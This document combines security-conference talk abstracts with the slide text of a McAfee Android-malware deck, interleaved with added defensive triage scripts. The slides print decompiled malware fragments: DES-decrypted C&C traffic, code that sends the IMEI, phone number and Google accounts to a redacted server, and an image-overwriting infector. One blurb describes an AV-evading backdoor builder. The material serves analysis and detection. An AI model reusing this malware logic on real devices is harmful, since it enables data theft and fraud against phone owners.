Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
Automotive Cybersecurity: Test Like a Hacker - ForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, and how to fit this offensive cybersecurity approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7 - Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Secure Software: Action, Comedy or Drama? (2017 edition) - Peter Sabev
If they made movies about the most important software security issues, they could be put under five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts of software security nowadays? A talk presented at the IT-Weekend event in Ruse, Bulgaria (2017).
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense - John Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Your Peripheral Has Planted Malware - An Exploit of NXP SOCs Vulnerability - Priyanka Aash
"There are billions of ARM Cortex M based SOCs being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measures to the ARM Cortex M product for a few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection into the firmware. Vendors normally rely on the security measures built within the chip (unique ID number/signature) or security measures built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered, and it will be in two parts:
The first is the security measure built within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is the security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
TheFatRat is an easy tool to generate backdoors with msfvenom (part of the Metasploit framework) and to carry out easy post-exploitation attacks. The tool compiles malware with a popular payload, and the compiled malware can then be executed on Android, Windows or Linux. Malware created with this tool also has the ability to bypass most AV software protection; bypassing the anti-virus or security software allows a Metasploit session between the attacker and the target without the anti-virus detecting the malicious payload and flagging a warning back to the user.
Presentation by Saurabh Harit at the Mobile Security Summit in Johannesburg, 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Can't touch this: cloning any Android HCE contactless card - Slawomir Jasek
There is no doubt that mobile contactless payments have grown exponentially, and Host Card Emulation - the possibility to emulate payment cards on a mobile device without depending on special Secure Element hardware - has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified "black-box" library to compile into your application. Obviously vendors promise the "highest level of security" - including card data tokenization, a "secure element in the cloud", device fingerprinting, a phone unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince the implementing bank that it is technically impossible to "clone" a virtual card from the owner's device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware attacking the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device every time caused, at the least, confusion and uncertainty. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With the introduction of root-exploiting financial malware, attackers already have the technical means to attack HCE. Therefore it is now crucial to understand the associated risks and properly plan mitigation ahead. This presentation will start with a short introduction to HCE - including "ISIS"'s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences from a hardware Secure Element. We will cover several possibilities to attack HCE, including a universal method of cloning any Android contactless payment (including Google's own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented, along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Brick all the internet of things! (with notes) - Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleep - Jimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) - Current Trends in Mobile APT - Jimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat (APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experiment - Jimmy Shah
The Internet of Things is not as complex as one would think. Objects (e.g. power meters, fridge computers, etc.) or "Things" don't have their own Internet; instead they "speak" to each other over the same Internet we all use. There lies their vulnerability: the assumption that since the machines will only talk to each other, no one will eavesdrop or intrude on their conversation. Security researchers have a saying, "Security through Obscurity is no Security".
The presentation shows how the Internet of Things' veil of obscurity can be pierced, by walking through how an attacker (or, more likely, a security researcher) would assess a particular smart parking meter ecosystem. Only open source intelligence (OSINT) [e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine-to-machine (M2M) SIMs
* management consoles
* RF usage
Viruses on mobile platforms - why we don't/don't we have viruses on Android - Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics: the path from 'eh' to 'pretty good' - Jimmy Shah
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones; attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful (i.e. fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Smartphone Ownage: The state of mobile botnets and rootkits - Jimmy Shah
Symbian Botnet? Mobile Linux Rootkits? iPhone Botnets? Millions of phones at risk? The press coverage on smart phone threats is at times somewhat accurate, distant, and occasionally (if unintentionally) misleading. They tend to raise questions such as: How close to PC levels (100,000+ to millions of nodes) have mobile botnets reached? Have mobile rootkits reached the complexity of those on the PC?
This talk covered the state of rootkits and botnets on smart phones from the perspective of anti-malware researchers, including demystification of the threat from mobile rootkits and mobile botnets, the differences (if any) between mobile rootkits and mobile botnets vs. their PC counterparts, and a look at how samples seen in the wild and researcher PoCs function.
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
1. McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?:
Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
6. Attacker Tricks - Encryption
• Simple
– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shar
ed/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent
;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe
rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js">
</script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get
product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.
<SMS#>::<MSG>::173.88руб.
<SMS#>::<MSG>::86.00руб.
7. Attacker Tricks - Encryption
• Complex
– Symmetric cipher
• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
// Decompiled fragment: builds a DES decryptor from a key held in a static field (k.b)
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;

byte abyte1[] = k.b;                                   // hard-coded key bytes
DESKeySpec deskeyspec = new DESKeySpec(abyte1);
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");
b = cipher;                                            // cached in a field for later use
cipher.init(2, secretkey);                             // 2 == Cipher.DECRYPT_MODE
8. Attacker Tricks – Fraud
• Pretending to be a legitimate app
– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud (the com/example/android/service "kitchen timer" classes above)
Android/FakeToken (the token/bot classes above)
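A triage script for the pattern shown on this slide: an app whose class listing contains a legitimate-looking package plus a second package the app never declared. This is an added example, not code from the deck or from McAfee; the sample listing is constructed from the class names on the slide, and the "suspicious name" list is an illustrative assumption, not a signature set.

```python
"""Triage an APK class listing for code that lives outside the app's declared package.

Added example, not code from the original slides. The sample listing below is
constructed from the class names shown on the slide: a "kitchen timer" under
com.example.android.service that also bundles a token/bot package.
"""
from collections import defaultdict

SAMPLE_CLASS_LIST = """\
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main.class
./com/example/android/service/R$string.class
./token/bot/AutorunReceiver.class
./token/bot/SmsReciver.class
./token/bot/WebApi.class
./token/bot/SendSmsResult.class
./token/bot/MainService.class
"""

# Name fragments worth a second look when they occur in a package the app does
# not declare. Assumption: an illustrative list, not a complete one.
SUSPICIOUS_NAME_PARTS = ("sms", "autorun", "bot", "webapi", "update")


def parse_class_list(listing):
    """Return (dotted package, simple class name) pairs from a find-style listing."""
    entries = []
    for line in listing.splitlines():
        line = line.strip()
        if not line.endswith(".class"):
            continue
        path = line[2:] if line.startswith("./") else line
        path = path[: -len(".class")]
        package, _, cls = path.rpartition("/")
        entries.append((package.replace("/", "."), cls))
    return entries


def foreign_packages(entries, declared_package):
    """Group classes by package, keeping only packages outside declared_package."""
    by_pkg = defaultdict(list)
    for pkg, cls in entries:
        by_pkg[pkg].append(cls)
    return {
        pkg: sorted(classes)
        for pkg, classes in by_pkg.items()
        if pkg != declared_package and not pkg.startswith(declared_package + ".")
    }


def triage(listing, declared_package):
    """Return {package: {"classes": [...], "suspicious": [...]}} for foreign packages."""
    findings = {}
    for pkg, classes in foreign_packages(parse_class_list(listing), declared_package).items():
        flagged = [c for c in classes
                   if any(part in c.lower() for part in SUSPICIOUS_NAME_PARTS)]
        findings[pkg] = {"classes": classes, "suspicious": flagged}
    return findings


if __name__ == "__main__":
    for pkg, info in triage(SAMPLE_CLASS_LIST, "com.example.android.service").items():
        print(pkg, "->", ", ".join(info["suspicious"]) or "(no suspicious names)")
```

The declared package comes from the manifest; anything outside it is not automatically malicious (libraries live there too), so the output is a list for an analyst to read, not a verdict.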
10. Attacker Tricks – Fraud
• Android/OneClickFraud
– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
// Decompiled fragment (Android/OneClickFraud): the receiver re-arms a timer so the
// subscription prompt comes back every 5 minutes (300000 ms).
public void onReceive(Context paramContext, Intent paramIntent)
{
    kitchenTimerService.schedule(300000L);   // 300000 ms = 5 minutes
    setContentView(2130903040);              // shows a layout by resource id
    Account[] arrayOfAccount;
11. Attacker Tricks – Fraud
• Android/OneClickFraud
– Sends user information including Google account to the attacker
// Decompiled fragment (Android/OneClickFraud): on first run (ctf == 0) it collects the
// IMEI, phone number and account list and hands them to the attacker's server in a URL.
if (ctf.intValue() == 0)
{
    Main localMain = Main.this;
    Integer localInteger = Integer.valueOf(1);
    localMain.ctf = localInteger;                                   // mark as already run
    TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
    arrayOfAccount = AccountManager.get(Main.this).getAccounts();   // every account on the device, Google included
    str1 = "";
    int i = arrayOfAccount.length;
    j = 0;
    if (j >= i)                  // loop condition as decompiled; the body that fills str1 is not shown
    {
        String str2 = doPost("http://<removed>", "");               // server-issued user id
        StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
        String str3 = localTelephonyManager.getDeviceId();          // IMEI
        StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
        String str4 = localTelephonyManager.getLine1Number();       // phone number
        Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
        Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
        startActivity(localIntent1);                                // hands the URL to the browser
        boolean bool = moveTaskToBack(1);                           // then hides itself
    }
}
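The fragment above leaks the IMEI, the phone number, the account address and a server-issued id in a plain GET query string, which is visible to any proxy or gateway log. The following is an added example (not from the deck) of checking request logs for that shape of leakage; the log lines, hosts and parameter names are constructed, and the phone-number heuristic is an assumption tuned to keep ordinary numeric ids from firing.

```python
"""Flag HTTP request URLs whose query string carries device or account identifiers.

Added example, not from the original slides. The decompiled fragment builds a
GET request carrying the IMEI (getDeviceId), the phone number (getLine1Number),
the Google account address and a server-issued user id. This checks proxy-style
log lines for the same kind of leakage. Log lines and hosts are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")
PHONE_RE = re.compile(r"^\+?\d{10,15}$")
# A bare run of digits is only called a phone number when the parameter name
# hints at one or the value carries a leading "+". Assumption, to limit noise.
PHONE_NAME_HINTS = ("tel", "phone", "msisdn", "number")

# Constructed sample: the first line mirrors the slide's URL layout (the IMEI is
# appended with no key, then &telno=...), the second is ordinary traffic.
SAMPLE_LOG = [
    "GET http://c2.example.invalid/reg?490154203237518&telno=15555550100&m_addr=victim@example.com&usr_id=42",
    "GET http://news.example.invalid/list?page=2&lang=en",
]


def luhn_ok(digits):
    """Luhn checksum; a valid 15-digit IMEI satisfies it (last digit is the check digit)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 if d < 5 else d * 2 - 9
        total += d
    return total % 10 == 0


def classify(name, value):
    """Label a parameter whose value (or bare name) looks like an identifier, else None."""
    candidate = value or name   # "?<imei>&telno=..." parses as a name with an empty value
    if candidate.isdigit() and len(candidate) == 15 and luhn_ok(candidate):
        return "imei"
    if EMAIL_RE.match(candidate):
        return "email"
    if PHONE_RE.match(candidate) and (
        candidate.startswith("+") or any(h in name.lower() for h in PHONE_NAME_HINTS)
    ):
        return "phone"
    return None


def scan_url(url):
    """Return {param: label} for query parameters that look like identifiers."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        label = classify(name, value)
        if label:
            hits[name] = label
    return hits


def scan_log(lines):
    """Return [(line_index, url, hits)] for 'METHOD URL' log lines that leak identifiers."""
    results = []
    for i, line in enumerate(lines):
        parts = line.split()
        if len(parts) < 2:
            continue
        hits = scan_url(parts[1])
        if hits:
            results.append((i, parts[1], hits))
    return results


if __name__ == "__main__":
    for idx, url, hits in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {hits} in {url}")
```

Luhn-valid 15-digit values still appear in benign traffic about one time in ten for random numbers, so the IMEI label is a lead to correlate with the requesting app, not proof on its own.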
12. 4/19/12
Attacker Tricks - Injecting code
• Android/Moghava.A
– Malicious code injected into a legitimate app
• Recipes for Iranian meals
13.
Attacker Tricks - Injecting code
• Android/Moghava.A
– Real virus
• Overwriting file infector
– Not executable files, just image files
» Specifically all of your JPGs
» Designed to "photo bomb" all your photos with the Ayatollah Khomeini
• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
14.
Attacker Tricks - Injecting code
// Decompiled fragment (Android/Moghava.A): decode the bundled picture (resource 2130837505)
// and the victim's JPG, draw the JPG onto a fresh canvas, then stamp the bundled picture
// over it at (100, 300). Nothing checks whether the file was already stamped on an earlier run.
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);   // bundled picture
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());                    // victim's JPG
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)                                                  // only photos wider than the stamp are touched
{
    i3 = localBitmap2.getWidth();
    i4 = localBitmap2.getHeight();
    label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
    localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);     // new canvas, same size as the photo
    Canvas localCanvas = new Canvas(localBitmap3);
    float f1 = 0.0F;
    float f2 = 0.0F;
    Paint localPaint1 = null;
    localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);   // photo at (0, 0)
    float f3 = 100.0F;
    float f4 = 300.0F;
    Paint localPaint2 = null;
    localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);   // stamp at (100, 300)
}
16.
Attacker Tricks – Recording Audio
• Audio
– DTMF ("Touch Tones")
– Telephone Calls
• Initially used in academic PoCs
– SoundComber
• DB of IVR Converted DTMF
• January 2011
• Very common in spyware
• Used in malware
17.
Attacker Tricks – Recording Audio
• Android/Nickispy
– Records to AMR files
– August 2011
• Android/GoldenEagle
– Records to AMR files
– September 2011
• Audio recording benefits
– Trade secrets
– CC#
– PINs
18.
Attacker Tricks - Malware Updates
• Malware authors are now including update functionality
– Keeping the profits rolling in and maintaining control of devices
– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES
• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked
– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch
• Really just trojan horses
– Malware updating itself
• More functions
– Send sensitive user info
– Exfiltrate data
• New/patched payloads
– Exploits
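The update, SMS, audio-recording and boot-persistence behaviours on these slides each map to a small set of declared permissions, so a manifest is a cheap first triage point. This is an added example, not the deck's or McAfee's own logic: the manifest is constructed, and the behaviour-to-permission groupings are an illustrative assumption rather than a signature set.

```python
"""Flag permission combinations in AndroidManifest.xml that line up with the
behaviours described on the slides (self-update, SMS, audio recording, boot start).

Added example, not from the original slides. The manifest below is constructed.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for a "game" that also wants to install packages,
# send and receive SMS, record audio and start at boot.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Fun Game"/>
</manifest>
"""

# Behaviours from the slides and the permissions that enable them.
# Assumption: an illustrative starting point for review, not a detection rule set.
PATTERNS = {
    "self-update / package install": {"android.permission.INSTALL_PACKAGES",
                                      "android.permission.INTERNET"},
    "premium-rate sms sending": {"android.permission.SEND_SMS"},
    "sms interception": {"android.permission.RECEIVE_SMS"},
    "audio recording with upload": {"android.permission.RECORD_AUDIO",
                                    "android.permission.INTERNET"},
    "boot persistence": {"android.permission.RECEIVE_BOOT_COMPLETED"},
}


def declared_permissions(manifest_xml):
    """Set of android:name values from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def match_patterns(perms):
    """Labels whose full permission set is present in perms, sorted for stable output."""
    return sorted(label for label, needed in PATTERNS.items() if needed <= perms)


def triage_manifest(manifest_xml):
    """Return the package name, its permissions and the behaviour patterns they enable."""
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(manifest_xml)
    return {
        "package": root.get("package"),
        "permissions": sorted(perms),
        "patterns": match_patterns(perms),
    }


if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    print(report["package"])
    for label in report["patterns"]:
        print("  -", label)
```

On stock Android, INSTALL_PACKAGES is not granted to ordinary third-party apps at all, so a manifest that requests it is itself worth a look regardless of what else is declared. The slide's fake "SYSTEM_PATCH" style trojans need none of this: they are simply new installs, which is why permission triage complements rather than replaces checking where an update actually came from.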
19.
Attacker Tricks - Malware Updates
• Real malware updates
– Because even the bad guys understand that sometimes you need to patch
• Usually not visual
– Don't inform the users/victims
– Don't depend on users to approve updates
20.
Academic Research - Taplogger
• Taplogger
– Combination training and attack app
• Reads accelerometer for keypresses
• Training app is a fake icon matching game
– High score = trained it to steal your pin
• Two attacks
– Number pad logging
» PINs, CC#s, etc.
– Password stealing
» Screen unlock
– Previous research
• Touchlogger
– Two parts – training and logging
• ACCessory
– Detects full keyboard
22. Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
– Function of slow patching on Android and the number of parties involved in releasing new firmware
• "too many chefs in the kitchen"
– Leads to the same three or four common exploits and minor modifications
Exploit              Detected as
PSneuter             Exploit/RetuenSP.A
Gingerbreak          Exploit/Voldbrk, 18 minor variants of the same exploit
Exploid              Exploit/Lvedu, 26 minor variants
RageAgainstTheCage   Exploit/Diutes, 5 minor variants
23. Attacker Tricks – Server-Side Polymorphism
• Server-side
– Uses larger resources server side vs. lower powered devices
– Modifying DEX files
• Manual changes
– Renaming source and recompiling
• Automated changes
– Easier than it sounds
– Scriptable text changes in source
24. Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller
• Main generic signature
• Supplementary detections for 25 variants
• Changes
– By day
– By hour
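The slide's answer to hourly re-generated variants is a main generic signature rather than one hash per build. The following added example (not the deck's or McAfee's own detection code) shows the idea behind such a signature: it keys on framework API calls and string constants and discards app-local class and method names, so the scripted renames that server-side polymorphism relies on do not change it. The smali fragments are constructed; the second variant is the first with its own classes renamed, the third is a benign app.

```python
"""A renaming-resistant generic signature for decompiled (smali) code.

Added example, not the slides' or McAfee's detection logic. The fragments below
are constructed: VARIANT_B is VARIANT_A after a scripted rename of app-local
identifiers, the kind of change the slide describes; BENIGN is an unrelated app.
"""
import hashlib
import re

INVOKE_RE = re.compile(
    r"invoke-\w+\s+\{[^}]*\},\s*(L[\w/$]+;)->(\w+|<init>)\("
)
CONST_STR_RE = re.compile(r'const-string(?:/jumbo)?\s+v\d+,\s*"((?:[^"\\]|\\.)*)"')
# Calls into these namespaces are kept verbatim; everything else is app-local.
FRAMEWORK_PREFIXES = ("Landroid/", "Ljava/", "Ljavax/", "Ldalvik/")

VARIANT_A = """
.class public Lcom/app/a/Sender;
.method public run()V
    const-string v0, "SMS sent"
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v1
    invoke-virtual {v1, v2, v3, v4, v5, v6}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    invoke-virtual {p0}, Lcom/app/a/Sender;->report()V
    return-void
.end method
"""
# Scripted rename of the app's own class and method, as an attacker's build step would do.
VARIANT_B = VARIANT_A.replace("Lcom/app/a/Sender;", "Lorg/x/q/Zz;").replace("->report()", "->k7()")

BENIGN = """
.class public Lcom/timer/Main;
.method public onCreate(Landroid/os/Bundle;)V
    const-string v0, "Kitchen timer"
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-virtual {p0}, Lcom/timer/Main;->setup()V
    return-void
.end method
"""


def features(smali):
    """Sorted feature list: framework API calls, a placeholder per app-local call, string constants."""
    feats = []
    for m in INVOKE_RE.finditer(smali):
        cls, method = m.group(1), m.group(2)
        if cls.startswith(FRAMEWORK_PREFIXES):
            feats.append(f"{cls}->{method}")
        else:
            feats.append("<app>-><app>")   # identity of app-local code is deliberately dropped
    feats += [f"str:{s}" for s in CONST_STR_RE.findall(smali)]
    return sorted(feats)


def generic_signature(smali):
    """Hash of the normalised features; stable across renames of app-local identifiers."""
    return hashlib.sha256("\n".join(features(smali)).encode()).hexdigest()


def raw_hash(smali):
    """Hash of the bytes as-is, which any rename defeats."""
    return hashlib.sha256(smali.encode()).hexdigest()


if __name__ == "__main__":
    print("raw hashes equal:    ", raw_hash(VARIANT_A) == raw_hash(VARIANT_B))
    print("generic sigs equal:  ", generic_signature(VARIANT_A) == generic_signature(VARIANT_B))
    print("benign matches:      ", generic_signature(BENIGN) == generic_signature(VARIANT_A))
```

Sorting the feature list makes the signature independent of method order as well as of names; the trade-off is that an attacker who adds or removes a framework call also changes it, which is where the slide's supplementary per-variant detections come in.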
A lot of SMS sending trojans use very simple encryption or obfuscation.
The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possibly modified a standard Microsoft-provided HTML file. If you're not looking for it you'd miss it.
Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are.
Of course if you have the binary, these are easy to reverse.
More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its C&C traffic and URL queries.
This is a research PoC. It's in two parts: a desktop application to identify keystrokes from accelerometer readings and, eventually, an app that uses the derived keystroke/touch database to identify individual numbers.
Future improvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters.
The attacker profits initially by identifying when numbers are entered; these can be CC#s, SS#s or PINs. Future work could capture passwords, account names and other sensitive data.
Botnets are pretty straightforward. They're basically client-server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then controls them from their command and control server.
Command and control can vary from a simple single server to a network of redundant servers.
Botnets are good for performing attacks against targets (DDoS, phishing, etc.) and for gathering information: personally identifiable information, financial records and other confidential information.
Depending on how complex they are, the botnet clients may also utilize features of rootkits.